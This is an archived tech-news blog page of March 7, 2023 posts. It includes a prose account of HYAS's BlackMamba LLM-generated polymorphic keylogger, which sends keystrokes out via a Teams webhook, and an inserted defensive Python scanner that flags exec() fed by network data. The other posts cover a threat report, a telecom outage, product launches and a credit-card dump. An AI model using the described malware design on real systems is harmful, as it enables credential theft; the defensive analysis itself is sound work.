Archive for March 7, 2023

HYAS issues POC of BlackMamba AI-based polymorphic malware

Posted in Commentary with tags on March 7, 2023 by itnerd

To illustrate what AI-based malware is capable of, the team at HYAS Labs has just released a proof of concept (PoC) exploiting a large language model to synthesize polymorphic keylogger functionality on-the-fly, dynamically modifying the benign code at runtime — all without any command-and-control infrastructure to deliver or verify the malicious keylogger functionality. The PoC and results are published in the HYAS blog post BlackMamba: Using AI to Generate Polymorphic Malware and whitepaper “HYAS Labs Threat Intelligence: BlackMamba AI-Synthesized, Polymorphic Keylogger with On-the-Fly Program Modification.”

To create the POC, HYAS researchers united two seemingly disparate concepts:

a) eliminating the command and control (C2) channel by using malware that could be equipped with intelligent automation and could push-back any attacker-bound data through some benign communication channel, and

b) leveraging AI code generative techniques that could synthesize new malware variants, changing the code such that it can evade detection algorithms.

BlackMamba utilizes a benign executable that reaches out to a high-reputation API (OpenAI) at runtime, which returns the synthesized malicious code needed to steal an infected user’s keystrokes. It then executes the dynamically generated code within the context of the benign program using Python’s exec() function, with the malicious polymorphic portion remaining entirely in memory. Every time BlackMamba executes, it re-synthesizes its keylogging capability, making the malicious component of this malware truly polymorphic. BlackMamba was tested many times against an industry-leading EDR, which will remain nameless, resulting in zero alerts or detections.

Once a device is infected, BlackMamba uses MS Teams as its exfiltration channel. Using its built-in keylogging ability, BlackMamba can collect sensitive information, such as usernames, passwords, credit card numbers, and other personal or confidential data that a user types into their device. Once this data is captured, the malware uses an MS Teams webhook to send the collected data to the malicious Teams channel, where it can be analyzed, sold on the dark web, or used for other nefarious purposes.

Delivery uses auto-py-to-exe, an open-source Python package that lets developers convert Python scripts into standalone executable files that can be run on Windows, macOS, and Linux operating systems. As the HYAS blog notes: “The threats posed by this new breed of malware are very real. By eliminating C2 communication and generating new, unique code at runtime, malware like BlackMamba is virtually undetectable by today’s predictive security solutions.”
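A defender-side check for the pattern described above, where the string handed to exec() originated in a network response. This is an added example, not code from HYAS or its PoC; the set of network-client root names and the sample script are constructed assumptions.

```python
import ast

# Roots of attribute chains that fetch data from the network (an assumption for
# this example; extend it for the HTTP/API clients used in your code base).
NETWORK_ROOTS = {"requests", "urllib", "http", "httpx", "aiohttp", "socket", "openai"}
# Built-ins that turn a string into executable code.
CODE_SINKS = {"exec", "eval", "compile"}

# Constructed sample script: text fetched over HTTP flows through a helper
# into exec(); the eval() of a constant is a benign control case.
SAMPLE = '''\
import requests

def fetch_snippet(url):
    reply = requests.get(url, timeout=5)
    return reply.text

body = fetch_snippet("https://example.invalid/snippet")
exec(body)
eval("1 + 1")
'''


def _root_name(node):
    """Return the leftmost identifier of a Name/Attribute/Call/Subscript chain."""
    while True:
        if isinstance(node, ast.Name):
            return node.id
        if isinstance(node, ast.Attribute):
            node = node.value
        elif isinstance(node, ast.Call):
            node = node.func
        elif isinstance(node, ast.Subscript):
            node = node.value
        else:
            return None


def _is_tainted(node, tainted):
    """True if the expression uses a tainted name or calls a network client directly."""
    for sub in ast.walk(node):
        if isinstance(sub, ast.Name) and sub.id in tainted:
            return True
        if isinstance(sub, ast.Call) and _root_name(sub.func) in NETWORK_ROOTS:
            return True
    return False


class _DynamicCodeVisitor(ast.NodeVisitor):
    def __init__(self):
        self.tainted = set()   # names (and functions) known to carry network data
        self.findings = []     # (line, sink) pairs

    def visit_Assign(self, node):
        self.generic_visit(node)
        if _is_tainted(node.value, self.tainted):
            for target in node.targets:
                for name in ast.walk(target):
                    if isinstance(name, ast.Name):
                        self.tainted.add(name.id)

    def visit_FunctionDef(self, node):
        # Walk the body first so local assignments are known, then mark the
        # function itself tainted if any return value carries network data.
        self.generic_visit(node)
        for sub in ast.walk(node):
            if isinstance(sub, ast.Return) and sub.value is not None:
                if _is_tainted(sub.value, self.tainted):
                    self.tainted.add(node.name)
                    break

    def visit_Call(self, node):
        self.generic_visit(node)
        if isinstance(node.func, ast.Name) and node.func.id in CODE_SINKS:
            if any(_is_tainted(arg, self.tainted) for arg in node.args):
                self.findings.append((node.lineno, node.func.id))


def find_dynamic_exec(source):
    """Return (line, sink) pairs where exec/eval/compile consumes network-derived data."""
    visitor = _DynamicCodeVisitor()
    visitor.visit(ast.parse(source))
    return visitor.findings


if __name__ == "__main__":
    for line, sink in find_dynamic_exec(SAMPLE):
        print(f"line {line}: {sink}() receives network-derived code")
```

Static checks of this kind apply to source under review or to Python recovered from a packaged executable; they complement, rather than replace, monitoring for unexpected outbound API and webhook traffic.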

The HYAS BlackMamba Blog and the full whitepaper are linked here.

UPDATE: I have two comments on this. The first is from Matt Mullins, Senior Security Researcher at Cybrary:

   “The BlackMamba sample is very interesting due to its integration of ChatGPT to “prompt hack” as part of its initial payload. The malware sends a prompt to ChatGPT, then using that returned information as part of the Python code (the exec function) creates the code, which is then injected and subsequently communicates back via a Teams webhook. This is a very simple yet very advanced piece of malware because it flies under most detection radars by simply using the same applications that users would (either out of curiosity or by job necessity).

   “The article says that it doesn’t have a C2, but technically it is using Teams for the communication, so what (in my opinion) would be a better term is the use of high reputation servers for the “C2” comms (Teams and the Microsoft infrastructure). This strategy isn’t entirely new as it has been used before with things like CDNs to bypass filters. Teams has been adopted by a large number of organizations, and also has a couple of issues beyond this that should warrant a serious conversation about its viability as a secure communications channel.

   “The BlackMamba malware is thoughtfully crafted, simple, and elegant. Thus it passes the sniff test of “KISS” or keep-it-simple-stupid when it comes to engineering. The creative use of ChatGPT with the injection code, along with the use of Teams, creates a really great 1-2 punch for bypassing most EDR and detections (human and machine based) as it allows the malware to “swim with the people.” This is a gold-standard for good OpSec, typically.”

Morten Gammelgaard, EMEA, co-founder of BullWall follows up with this: 

   “Truly unnerving. AI-controlled polymorphic malware without the need for command & control. This is a slam dunk – preventative measures will never be able to keep up and therefore will continue to be less and less effective.

   “This particular approach is one example of how the malware never looks the same (the AI regenerates it on each attack) so defenders cannot establish a model to defend against as they now do with known attack methods. The “keystroke” example here takes a common approach to how credentials are stolen and then used for access and shows how that approach can be made much more effective, i.e., bypass defenses. Not to mention that this approach did not even require a dedicated C2 server that could be tracked.

   “Also, polymorphic viruses historically rely on mutation engines to alter their decryption routines. If publicly available AI engines enable script kiddies to create these viruses, that’s a real problem.

   “When stealing system-specific credentials becomes easy, then access and lateral movement is easy and Bam! they have your data. At that point how they harm you is almost moot. Data theft and ransomware are popular abuses when that happens. So yeah, easier access is a very big deal.”

Government, Manufacturing, and Healthcare were top targets for cybercriminals in Canada in 2022

Posted in Commentary with tags on March 7, 2023 by itnerd

Trend Micro today announced a massive 55% increase in overall threat detections in 2022 and a 242% surge in blocked malicious files, as threat actors indiscriminately targeted consumers and organizations across all sectors.

The roundup report reveals several interesting trends for 2022 and beyond:

The top three MITRE ATT&CK techniques show us that threat actors are gaining initial access through remote services, then expanding their footprint within the environment through credential dumping to utilize valid accounts.

An 86% increase in backdoor malware detections reveals threat actors trying to maintain their presence inside networks for a future attack. These backdoors primarily targeted web server platform vulnerabilities.

A record number of Zero Day Initiative (ZDI) advisories (1,706) for the third year in a row is the result of a rapidly expanding corporate attack surface and researcher investment in automated analysis tools, which are finding more bugs. The number of critical vulnerabilities doubled in 2022. Two out of the top three CVEs reported in 2022 were related to Log4j.

The ZDI observed an increase in failed patches and confusing advisories, adding extra time and money to corporate remediation efforts and exposing organizations to unnecessary cyber risk.

Webshells were the top-detected malware of the year, surging 103% on 2021 figures. Emotet detections were second after undergoing something of a resurgence. LockBit and BlackCat were the top ransomware families of 2022.

Ransomware groups rebranded and diversified in a bid to address declining profits. In the future, we expect these groups to move into adjacent areas that monetize initial access, such as stock fraud, business email compromise (BEC), money laundering, and cryptocurrency theft.

Trend Micro recommends that organizations adopt a platform-based approach to managing the cyber-attack surface, mitigate security skills shortages and coverage gaps, and minimize the costs associated with point solutions. This should cover the following:

  • Asset management. Examine assets and determine their criticality, any potential vulnerabilities, the level of threat activity, and how much threat intelligence is being gathered from the asset.
  • Cloud security. Ensure that cloud infrastructure is configured with security in mind to prevent attackers from capitalizing on known gaps and vulnerabilities.
  • Proper security protocols. Prioritize updating software as soon as possible to minimize the exploitation of vulnerabilities. Options such as virtual patching can help organizations until vendors provide official security updates.
  • Attack surface visibility. Monitor disparate technologies and networks within the organization, as well as any security system that protects them. It may be difficult to correlate different data points from siloed sources.

To read a full copy of the report, Rethinking Tactics: 2022 Annual Cybersecurity Report, please click here.

It covers endpoints (Android & iOS, IoT, IIoT, PCs, Macs, Linux, servers), email, web and network layers, OT networks, cloud, home networks, vulnerabilities, consumers, businesses, and governments globally.

TELUS introduces the next generation of Optik TV

Posted in Commentary with tags on March 7, 2023 by itnerd

Today, TELUS introduced its next generation of Optik TV, unleashing a revolutionary content experience and simplifying the way customers find, stream and interact with their favourite content. The new Optik TV offers live and on demand TV across all devices, in addition to new features like personalized profiles, universal search, voice remote and access to thousands of apps through the Google Play Store, all in one intuitive digital box, making the entertainment experience for customers easier and better than ever. 

Powered by a sleek TELUS TV Digital Box with Bluetooth voice remote that takes only minutes to set up, the new Optik TV provides customers with an immersive entertainment experience. New features include: 

  • Simplified menu: The simplified menu and home screen provide easy access to live TV, recordings, search and On Demand content on the navigation bar.
  • Personalized profiles: Enjoy a more personalized TV experience where every member of the household can create a unique profile and get a customized home screen showcasing their favourite channels, movies, recent recordings, and the ability to pick up where they left off at any time.
  • Voice remote: Powered by Google Assistant, customers can control their TV and search for shows using the built-in microphone on the TELUS Remote.
  • Universal search: Customers can conveniently search across Live TV, On Demand, and streaming services to discover content faster without switching between apps.
  • Unlimited recordings: Cloud PVR offers customers unlimited recording capacity so they can save as many shows as they want, and watch them from any device at any time, anywhere in Canada through the TELUS TV+ app.
  • Sports Zone: Customers can create a curated home page capturing their favourite events and sports teams to easily navigate to live or upcoming games and current scores with just a single click.

Optik TV provides access to thousands of apps from Google Play, including YouTube, Netflix, and Amazon Prime Video preloaded for easy access. All plans come with the Core TV package which includes up to 36 HD channels, as well as local favourites. Customers can choose a Core+ Premium package which includes one premium streaming service such as Netflix for just $38 per month. For even more content, TELUS offers the Combo packages such as 4 Theme Packs + 1 Premium and 7 Theme Packs + 1 Premium where customers can choose from popular theme packs such as Disney Time, Sportsnet & Beyond, and Blockbusters. To learn more about TELUS Optik TV, visit www.telus.com/optiktv

Rogers Appears To Have Issues…. Serious Issues

Posted in Commentary with tags on March 7, 2023 by itnerd

Canadian telco Rogers isn’t having a good day based on this from Down Detector:

From a combination of my clients calling me and trawling the Internet, I can say that the problems that Rogers seems to be having cover the following areas:

  • Email if you are using a @Rogers.com email account. More on that in a second.
  • Rogers Ignite Internet
  • Cell Phone connectivity

In terms of Rogers email issues, this seems to have been going on for days, as evidenced by this thread on Rogers’ own support forums. Which is confirmed by numerous clients of mine pleading with me to help them. The good news, if you want to call it that, is that if you go to https://mail.yahoo.com and enter your Rogers email account details there, you can still get your email. But to be frank, this is a workaround and not a solution. Also, trying to create App Specific Passwords for Rogers email accounts does not work.

Clearly, Rogers has serious issues at the moment, and customers are not happy based on these examples from Twitter:

With this latest outage combined with what happened last July, any remaining goodwill that Rogers might have had is gone. And Rogers may not only find itself losing customers, but being forced to explain itself to Parliament, again. I’ll be watching this story as this is another situation where Rogers has absolutely crippled the daily existence of Canadians and I will provide updates when the situation warrants.

UPDATE: In terms of the Internet issues that Rogers is having, what seems to be working for some people (including a client of mine) is this:

You can try this and see if it works for you.

UPDATE 3/9: Rogers continues to have issues. I’ve documented them here.

Uber sharing travel trends and making airport travel a breeze with new features

Posted in Commentary with tags on March 7, 2023 by itnerd

Canadians everywhere are flying out of their seats at the opportunity to travel and get out to see the world again. And with spring and March Break just around the corner, many Canadians are looking for easier ways to plan their travel and navigate buzzing airports across the country.

As Uber trips to the airport are outpacing pre-pandemic levels, today, Uber is launching new in-app products and features as well as sharing Canadian travel trends to take stress and guesswork out of travel planning and, ultimately, help get Canadians to and from, and even around, the airport as quickly and efficiently as possible.

NEW IN-APP PRODUCTS AND FEATURES

  • Be ready to roll from the get-go: With Uber Travel, you can reserve rides for each leg of your itinerary in one fell swoop. Just connect your Gmail account and Uber will do the rest, organizing your hotel, flight, and restaurant reservations all in one place for a stress-free travel experience. With Uber Reserve, you can choose the ride that best fits your budget, luggage, and group size needs. Plus, you can also book your ride up to 90 days in advance, enabling you to lock in your ride at the same time as your flight and hotel, leaving no part of your trip to chance.
  • Minimize airport wandering to maximize your time for adventure: Seamlessly make your way through the airport with the new step-by-step wayfinding feature on our app. With detailed directions to get from the gate to the rideshare pick-up area, their new wayfinding product will help you navigate through airports with ease. Available at 30+ airports across the globe including Toronto YYZ and Calgary YYC in Canada.
  • Every minute counts: We all know the feeling of waiting to deboard a plane and wondering how long it’ll take to get from the gate to your ride. That’s why Uber is rolling out a new feature to help you plan how long it will take to walk from your gate to baggage claim, so you can accurately request your Uber ride. Available soon at more than 400 airports around the world including airports in the following Canadian cities: Montreal, London, Vancouver, Kitchener-Waterloo, Regina, Winnipeg, Calgary, Hamilton, Halifax, Ottawa, Quebec City, Toronto, Windsor, Kingston, Edmonton, Niagara Region, and Saskatoon.
  • Business Travel: Soon Uber for Business will be rolling out Business Comfort in select cities, an exclusive ride option for those traveling for work with a unique business-class experience. 

CANADIAN TRAVEL TRENDS 

Heading into one of the year’s busiest travel seasons, Uber looked at Uber Rides data to share new trends and insights highlighting how Canadians like to travel—from the busiest time and day of the week for travel to and from the airport to their favourite pre-flight eats!

Whether it’s arriving at the airport with enough time to grab a bite or looking for a quick and easy ride home after your travels, check out how these Canadian travel habits might help you plan your next trip.

Hello beauty sleep and goodbye to the red-eye

  • We’re a nation of early risers that want to be home by the end of the workday. On average, Canadians travel the most to the airport at 6:00 a.m. and back home at 5:00 p.m. Toronto is full of keeners, with the earliest travel time to the airport at 5:00 a.m. and Vancouverites want to be home by lunch, precisely at noon. 

We’d rather celebrate TGIF in the sky

  • What better way to kick off travel plans than with a weekend to play? Canadians would rather travel to the airport on Fridays and give themselves a three-day weekend by travelling back home from the airport on Mondays. If one thing is for sure, it’s that we know how to live it up.

We take our pre-flight culinary pre-gaming seriously

  • Many of us resort to snacking while waiting to board our flights—”treat yourself” is a way of life in our great nation. Canadians’ favourite way to do this? With breakfast sandwiches and muffins. As expected, we also have city-specific tastes. Toronto and Calgary have a penchant for spice with orders like pad thai, chicken shawarmas, butter chicken, and naan. Montréal loves tried, tested, and true comfort foods—think dumplings, fried chicken, and burgers. And Vancouver? With a (very specific) popular order of half chicken, fries, and soup, we’ll let you decide for yourself.

PROMO 

To help Canadians prepare for takeoff with these new airport features, Uber One members who use Uber Reserve in March 2023 will earn $20 in Uber Cash to put towards their next Reserve ride with the code GORESERVE. Canadians can rely on Uber to help them get where they need to go and back again safely, stress-free, and on time.

The full news release is on the Uber website here.

Salesforce Makes Several AI Related Announcements Today

Posted in Commentary with tags on March 7, 2023 by itnerd

Today, Salesforce put out a number of announcements. Each announcement leans into building responsible generative AI tools and ensuring they’re accessible to all scales of business. 

Einstein GPT

  • Einstein GPT is the next generation of Einstein, Salesforce’s AI technology which currently delivers more than 200 billion AI-powered predictions across Customer 360 per day.
  • With the combination of proprietary Einstein AI models with leading large language models, customers can use natural-language prompts on CRM data to trigger powerful, time-saving automations, and create personalized, AI-generated content.
  • At hyperscale, the technology delivers AI-created content across every sales, service, marketing, commerce and IT interaction.

ChatGPT for Slack

  • As part of an ongoing partnership, Salesforce and OpenAI introduced the ChatGPT app for Slack, built by OpenAI on the Slack platform, available immediately to all users. 
  • The app taps ChatGPT’s powerful AI technology to bring instant conversation summaries, research tools, and writing assistance directly into Slack. With the new integration, customers can:
    • Get up to speed faster on channels or threads: AI-powered conversation summaries help users quickly catch up on what’s happening.
    • Instantly find answers on any project or topic: with AI-powered research tools, users can learn and build expertise faster right from Slack — whether they’re researching best practices, prospecting a new account, or more.
    • Draft messages in seconds to communicate with customers and teams: with AI-powered writing assistance, users can spend less time crafting replies, status updates, and meeting notes — and more time putting the plan in action.

Salesforce Ventures Generative AI Fund

  • Salesforce Ventures launched a $250 million generative AI fund to bolster the startup ecosystem and spark the development of responsible generative AI. 
  • The fund will initially invest in four companies, Anthropic, Hearth, You.com and Toronto-based Cohere.ai. Each organization has demonstrated an ability to meaningfully transform application software and impact end users’ workflows using responsible and trusted development processes.

You can click the links above to learn more about each announcement.

Cradlepoint Unveils New Global MSP Program

Posted in Commentary with tags on March 7, 2023 by itnerd

Cradlepoint, the global leader in cloud-delivered LTE and 5G wireless network solutions, today announced significant updates for Managed Service Providers (MSPs) at this year’s North American Partner Summit in Austin, Texas, March 7-8. To bolster the managed service provider (MSP) experience, Cradlepoint will expand its current offerings as part of the existing Cradlepoint Partner Program, including enhancing NetCloud functionality and licensing benefits, specialized support, and the development of an “MSP Playbook.”

Organizations across industries increasingly turn to wireless solutions, such as 5G, to deliver agile, secure, and reliable wide-area network (WAN) connectivity. Gartner believes that the year of “wireless value realization” is upon us, with 50 per cent of enterprise wireless endpoints expected to use networking services that deliver additional capabilities beyond communication by 2025. This rapidly growing market underscores a significant opportunity for Cradlepoint and its partners to expand their Wireless WAN leadership, particularly regarding MSPs leveraging Cradlepoint’s NetCloud Service and portfolio of fixed site, mobile, and IoT cellular routers.

Customers leverage managed services to cut IT costs and stay current with new technologies. In response, MSP customers rely on Cradlepoint solutions, managed by NetCloud Manager, to meet growing needs. Cradlepoint is introducing a new flexible subscription model, allowing MSPs to control their customer lifecycle and bolstering profitability while rewarding partners for their performance and loyalty through future lead generation capabilities.

Specific new enhancements include: 

●  Updated Benefits and Requirements that align with the MSP practice 

●  Cradlepoint University Training targeted specifically for the MSP practice

●  New MSP-only subscription model and pricelist

●  Planned NetCloud Manager enhancements exclusively for MSPs

●  “White glove” logistics support

In addition to these enhancements, Cradlepoint will develop an “MSP Playbook,” set to launch in the second half of this year. As part of the playbook, partners will receive guidance on their market opportunity, use cases & success stories, marketing, sales, training support, and a full program review. The Playbook is designed to support MSPs further as they work with Cradlepoint to create and deliver managed networking and cloud-based services as key components in their offerings.

To learn more about the Cradlepoint Partner Program with the new MSP entitlements that will launch in Q3 2023, please visit Cascade or https://cradlepoint.com/partners/for-partners/resell-partners/.

BidenCash Market Posts 2Mill Credit Cards Online In Birthday Blitz 

Posted in Commentary with tags on March 7, 2023 by itnerd

First reported by Cyble researchers last week, this story continues to get a lot of buzz from Fox News and others this week. A web site that goes by the name of BidenCash Market has posted 2 million credit cards online as a promotional blitz to attract customers. The site operates on both the dark and clear web, offering credit card data for sale to the public.

The leaked information includes cardholders’ full names, card numbers, bank details, expiration dates, CVV codes, home addresses, and over 500,000 email addresses. According to D3Lab’s Head of Threat Intelligence, Andrea Draghetti, while tens of thousands of the numbers are duplicates, over two million of the entries are unique.

Last fall the same BidenCash Market released a free dump of over a million credit cards in a similar promotional gimmick. 

Baber Amin, COO of Veridium had this to say:

   “Even the most security aware can have their credit card information compromised and made available. This can happen due to no fault of the individual.

   “The data dump is not just about credit card information but contains valuable information that can be used for Identity theft. This second part should be a more serious concern, as it can lead to damage to credit score, reputation, and possibly legal issues. The damage from identity theft is long lasting.

   “On the financial side, the two main points of credit card compromise are:

  1. Point of sale and
  2. Magecart or online skimming.

   “EMV or chip cards were supposed to stop point of sale skimming. But because all EMV cards also have a mag stripe, if someone compromises the POS terminal where users are putting in their card, they can skim the information from the magstripe bypassing chip security.

   “Contactless cards aka “Touch and Pay” are thus more secure than even EMV, as the card never needs to be inserted into any device and never leaves the user.

  • As a merchant, make sure your POS terminals are up to date, especially for areas that are publicly visible, e.g. gas pumps, vending machines, ticket kiosks, etc.
  • As an end user, always opt to use contactless payment at the point of sale.

   “Magecart or online skimming is the compromise of online shopping carts and the checkout process. Bad actors can inject malware into ill-maintained ecommerce sites.

   “Additionally, all the security offered by EMV and contactless cards is nullified, when the user voluntarily enters the CC information at checkout. Not only that, but they also enter information that can be used for Identity Theft, e.g. email address, shipping address, possibly a username and a password, etc.

  • It is important for website administrators to stay up-to-date with their content management system’s patches and plugins. 
  • Buying from reputable online vendors is the best option for end users:
    • If possible, use virtual cards online
    • Use unique usernames and passwords on each site if you must create an account
    • If they offer PayPal during checkout, use it, as it creates an indirect level of payment
    • A better solution is to use services like Apple Pay and Google Pay, which replace sensitive information with arbitrary tokens (Tokenization). These services provide a more secure and convenient experience, as they use tokenization to protect sensitive information. Since these tokens disappear after each authorization, they cannot be reused if stolen. The other advantage of these services is that they work both in person and for online shopping. EMV or chip cards are reduced to the security of the older non-chip card when paying online, as there is no chip reader available.”

These are all good tips that I hope become the norm so that scams like this become a thing of the past.